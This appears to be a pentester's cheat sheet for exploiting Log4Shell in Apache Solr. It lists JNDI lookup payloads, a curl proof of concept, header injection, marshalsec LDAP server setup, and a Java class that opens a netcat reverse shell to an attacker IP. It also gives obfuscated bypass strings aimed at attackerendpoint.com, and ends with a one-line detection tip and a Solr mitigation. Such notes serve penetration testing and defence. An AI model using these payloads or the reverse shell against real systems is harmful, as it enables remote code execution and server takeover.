2.9 KiB
2.9 KiB
Log4Shell
-
log4j
< version 2.15.0rc2 -
Code inside a
param
value is parsed and a${payload}
will be executed, for example
${sys:os.name}
${sys:user.name}
${log4j:configParentLocation}
${ENV:PATH}
${ENV:HOSTNAME}
${java:version}
Java Naming and Directory Interface JNDI
- Vulnerability can be exploited via
${jndi:ldap://<attacker-IP>/foo}
POC
curl 'http://<target-IP>:8983/solr/admin/cores?foo=?$\{jndi:ldap://<attacker-IP>:4449\}'
Usage
- Fuzz endpoints to applicate the exploit
- Use HTTP header field as storage for payload as well as any other possible input field
X-Forwarded-For: ${jndi:ldap://<attacker-IP>:1389/foo}
- Clone and build marshallsec via
mvn clean package -DskipTests
- Java version should be the same as the one on the target
- Redirect LDAP server to HTTP server
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
- Compile following Java reverse shell via
javac Exploit.java -source 8 -target 8
to Exploit.class
public class Exploit {
static {
try {
java.lang.Runtime.getRuntime().exec("nc -e /bin/bash $ATTACKER_IP 4449");
} catch (Exception e) {
e.printStackTrace();
}
}
}
- Open reverse shell on
4449
curl 'http://.10.43.243:8983/solr/admin/cores?foo=$\{jndi:ldap://$ATTACKER_IP:1389/Exploit\}'
Detection
-
Parse logs for
jndi
Bypasses
- Possible bypasses are as follows
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${::-j}ndi:rmi://attackerendpoint.com/}
Mitgation
- Apache Solr security news
- Add the following line to
solr.in.sh
SOLR_OPTS="$SOLR_OPTS -Dlog4j2.formatMsgNoLookups=true"